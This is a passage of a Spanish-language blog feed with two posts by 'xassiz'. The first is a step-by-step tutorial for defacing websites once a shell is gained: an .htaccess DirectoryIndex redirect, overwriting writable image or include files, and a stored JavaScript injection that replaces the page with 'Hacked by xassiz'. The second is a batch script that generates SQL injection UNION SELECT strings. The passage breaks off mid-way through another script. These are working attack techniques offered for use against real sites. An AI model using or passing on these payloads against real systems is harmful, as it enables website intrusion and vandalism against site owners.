src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-240194559870037503</id><published>2009-12-24T15:10:00.000-08:00</published><updated>2009-12-24T15:22:24.003-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Defacing'/><title type='text'>[Tutorial] Modificar homepage sin permisos de escritura  -  by xassiz</title><content type='html'>&lt;div class="post" id="msg_782149"&gt;&lt;div align="center"&gt;&lt;b&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;span style="color:yellow;"&gt;Modificar homepage sin permisos de escritura&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:100%;" &gt;&lt;span style="color:lime;"&gt;by xassiz&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.redycable.com/images/restringida.jpg" alt="" border="0" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno, en este tutorial os enseñaré a modificar la página principal una vez en la shell, cuando no tenemos permisos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Además los admin se suelen dar cuenta mas tarde de como arreglarlo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Esto se hace muy facil, con el archivo &lt;b&gt;.htaccess&lt;/b&gt; en servidores Apache.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El &lt;b&gt;.htaccess&lt;/b&gt; (hypertext access) es un archivo especial para hacer la configuración de la web: desde restrinciones de IP hasta esta técnica de modificar el index &lt;img src="http://www.el-hacker.com/foro/Smileys/default/cheesy.gif" alt="Cheesy" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lo que debemos hacer es poner nuestro index en directorio en el que tengamos permisos.&lt;br /&gt;&lt;br /&gt;Por ejemplo, imaginando que la web sea así:&lt;br /&gt;&lt;br /&gt;&lt;div class="quote"&gt;&lt;blockquote&gt;admin&lt;br /&gt;docs&lt;br /&gt;imgs&lt;br /&gt;noticias&lt;br /&gt;---------&lt;br /&gt;news.php&lt;br /&gt;index.php&lt;br /&gt;.htaccess&lt;br /&gt;banner.jpg&lt;/blockquote&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Y tenemos permisos en el directorio &lt;b&gt;imgs&lt;/b&gt;, entonces entramos y uploadeamos &lt;b&gt;hacked.php&lt;/b&gt;, que sería nuestro index.&lt;br /&gt;&lt;br /&gt;Una vez subido volvemos al directorio principal y ponemos en el &lt;b&gt;.htaccess&lt;/b&gt; (si no está lo creamos):&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;DirectoryIndex imgs/hacked.php&lt;/blockquote&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Con esto le estamos indicando a la web el archivo del Index. Cuando vamos entonces a la website por arte de magia se muestra el archivo &lt;b&gt;hacked.php&lt;/b&gt; de homepage &lt;img src="http://www.el-hacker.com/foro/Smileys/default/grin.gif" alt="Grin" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;img src="http://mimttm.files.wordpress.com/2009/05/hacked.jpg" alt="" border="0" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;Otra opción que tenemos cuando no hay permisos en &lt;b&gt;index.php&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Si podemos subir archivos a ese directorio, o en el directorio hay alguno sin permisos ya está! aunque sea una foto!&lt;br /&gt;&lt;br /&gt;Por ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;div class="quote"&gt;&lt;blockquote&gt;admin&lt;br /&gt;docs&lt;br /&gt;imgs&lt;br /&gt;noticias&lt;br /&gt;---------&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;b&gt;news.php&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;b&gt;index.php&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;b&gt;.htaccess&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:lime;"&gt;&lt;b&gt;banner.jpg&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Tenemos el archivo &lt;b&gt;banner.jpg&lt;/b&gt; con permisos. Le damos a editar, entonces ponemos el código de nuestro index:&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;&amp;#60;center&amp;#62;&amp;#60;h1&amp;#62;Hacked by xassiz&amp;#60;/h1&amp;#62;&amp;#60;/center&amp;#62;&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Y le damos a RENAME, renombrando el archivo a &lt;b&gt;index.php&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vamos a la home, y de repente aparece nuestro index &lt;img src="http://www.el-hacker.com/foro/Smileys/default/cheesy.gif" alt="Cheesy" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;img src="http://i.zdnet.com/blogs/hacked_message.jpg" alt="" border="0" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;Otra manera es viendo el código de &lt;b&gt;index.php&lt;/b&gt;, y comprobando si hace &lt;b&gt;includes&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Por ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(0, 0, 187);"&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style="color: rgb(0, 0, 187);"&gt;&amp;#60;?php&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 119, 0);"&gt;include(&lt;/span&gt;&lt;span style="color: rgb(221, 0, 0);"&gt;"inc/header.php"&lt;/span&gt;&lt;span style="color: rgb(0, 119, 0);"&gt;);&lt;br /&gt;include(&lt;/span&gt;&lt;span style="color: rgb(221, 0, 0);"&gt;"news.php"&lt;/span&gt;&lt;span style="color: rgb(0, 119, 0);"&gt;);&lt;br /&gt;include(&lt;/span&gt;&lt;span style="color: rgb(221, 0, 0);"&gt;"inc/footer.php"&lt;/span&gt;&lt;span style="color: rgb(0, 119, 0);"&gt;);&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 187);"&gt;?&amp;#62;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style="color: rgb(0, 0, 187);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Entonces vamos al directorio &lt;b&gt;inc&lt;/b&gt; y vemos que el archivo &lt;b&gt;header.php&lt;/b&gt; tiene permisos de escritura. Le modificamos el código por el de nuestro index (sin renombralo ni nada) y listo! Aparece en el index.&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;div align="center"&gt;&lt;img src="http://psp.88000.org/wallpapers/48/You%27ve_Been_Hacked%21.jpg" alt="" border="0" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Y que pasa si también tiene permisos? Pues podemos repetir el segundo método!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;Si no dimos subido una shell y solo podemos poner noticias, etc?&lt;br /&gt;&lt;br /&gt;Pues imaginemos que el título de las noticias aparecen en la principal, y en ese titulo podemos inyectar código.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Podemos poner un código javascript que transforme el index entero &lt;img src="http://www.el-hacker.com/foro/Smileys/default/cheesy.gif" alt="Cheesy" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;&amp;#60;script&amp;#62;document.documentElement.innerHTML="&amp;#60;br/&amp;#62;&amp;#60;center&amp;#62;&amp;#60;h1&amp;#62;Hacked by xassiz&amp;#60;/h1&amp;#62;";&amp;#60;/script&amp;#62;&lt;/blockquote&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Vamos al index..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;img src="http://xasscapturas.webcindario.com/defaces/iecah.org.jpg" alt="" border="0" height="585" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero que os haya gustado este tutorial! &lt;img src="http://www.el-hacker.com/foro/Smileys/default/wink.gif" alt="Wink" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;bytes&lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-240194559870037503?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/240194559870037503/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/12/tutorial-modificar-homepage-sin.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/240194559870037503'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/240194559870037503'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/12/tutorial-modificar-homepage-sin.html' title='[Tutorial] Modificar homepage sin permisos de escritura  -  by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-8952234293335861225</id><published>2009-12-20T06:03:00.000-08:00</published><updated>2009-12-20T06:06:42.241-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL Injection'/><category scheme='http://www.blogger.com/atom/ns#' term='Defacing'/><title type='text'>[Tool] SQL Copy Column  -  by xassiz</title><content type='html'>&lt;div align="center"&gt;&lt;b&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color:Yellow;"&gt;&lt;br /&gt;SQL Copy Column  -  by xassiz&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Es una creación mía, hecha en &lt;b&gt;Batch&lt;/b&gt;, anterior al &lt;a href="http://xassiz.blogspot.com/2009/12/tool-sqlc-sql-columnator-by-xassiz.html" target="_blank"&gt;&lt;b&gt;SQLC&lt;/b&gt;&lt;/a&gt; en &lt;b&gt;Perl&lt;/b&gt;, pero que decidi postear despues porque se pueden complementar muy bien.&lt;br /&gt;&lt;br /&gt;El &lt;a href="http://xassiz.blogspot.com/2009/12/tool-sqlc-sql-columnator-by-xassiz.html" target="_blank"&gt;&lt;b&gt;SQLC&lt;/b&gt;&lt;/a&gt; te da el número de columnas de una página web por Inyección SQL, y el &lt;b&gt;SQL Copy Column&lt;/b&gt; te pide el número de columnas y te copia la inyección ya hecha al portapapeles.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero que os gusten estas cosas, porque a mi me vienen de lujo &lt;img src="http://foro.latinohack.com/images/smilies/daz.gif" alt="" title="Daz" class="inlineimg" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;!-- BEGIN TEMPLATE: bbcode_highlight --&gt; &lt;div style="margin: 5px 20px 20px;"&gt;    &lt;pre class="alt2" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 308px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="dos"  style="font-family:monospace;"&gt;&lt;ol&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;@&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt; off&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;a href="http://www.ss64.com/nt/title.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;title&lt;/span&gt;&lt;/a&gt; SQL &lt;a href="http://www.ss64.com/nt/copy.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Copy&lt;/span&gt;&lt;/a&gt; Column - by xassiz&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;a href="http://www.ss64.com/nt/setlocal.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;setlocal&lt;/span&gt;&lt;/a&gt; enabledelayedexpansion&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;main&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; "num="&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; /p "num=Numero de columnas&gt; "&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;a href="http://www.ss64.com/nt/if.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;if&lt;/span&gt;&lt;/a&gt; &lt;a href="http://www.ss64.com/nt/not.html"&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;not&lt;/span&gt;&lt;/a&gt; &lt;a href="http://www.ss64.com/nt/defined.html"&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;defined&lt;/span&gt;&lt;/a&gt; num &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:main&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt;/p=-1+union+select+&lt;&lt;a href="http://www.ss64.com/nt/nul.html"&gt;&lt;span style="color: rgb(0, 0, 255); font-weight: bold;"&gt;nul&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;for&lt;/span&gt;&lt;/a&gt; /l &amp;amp;#&lt;span style="color: rgb(204, 102, 204);"&gt;37&lt;/span&gt;;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;x&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;in&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;1,1,&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;num&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;do&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt;/p=&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;x&lt;/span&gt;,&lt;&lt;a href="http://www.ss64.com/nt/nul.html"&gt;&lt;span style="color: rgb(0, 0, 255); font-weight: bold;"&gt;nul&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div   style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;font-family:monospace;font-size:1em;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&gt;columnas.txt&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;for&lt;/span&gt;&lt;/a&gt; /f "tokens=*" &lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;_ &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;in&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;columnas.txt&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;do&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; "line=&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;_"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;.!line:~0,-1!--|clip&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/del.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;del&lt;/span&gt;&lt;/a&gt;/q/s/f/a "columnas.txt"&gt;&lt;a href="http://www.ss64.com/nt/nul.html"&gt;&lt;span style="color: rgb(0, 0, 255); font-weight: bold;"&gt;nul&lt;/span&gt;&lt;/a&gt;;2&gt;&amp;amp;1&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:main&lt;/div&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/div&gt;&lt;/div&gt;&lt;/pre&gt; &lt;/div&gt; &lt;!-- END TEMPLATE: bbcode_highlight --&gt;&lt;br /&gt;Para ejecutarlo se necesita tener el comando clip.exe&lt;br /&gt;&lt;br /&gt;Si no lo teneis lo podeis construir con este otro script:&lt;br /&gt;&lt;br /&gt;&lt;!-- BEGIN TEMPLATE: bbcode_highlight --&gt; &lt;div style="margin: 5px 20px 20px;"&gt;    &lt;pre class="alt2" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 516px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div class="dos"  style="font-family:monospace;"&gt;&lt;ol&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;@&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt; off&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;:&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;: by xassiz&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;:&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div face="monospace" size="1em" style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; 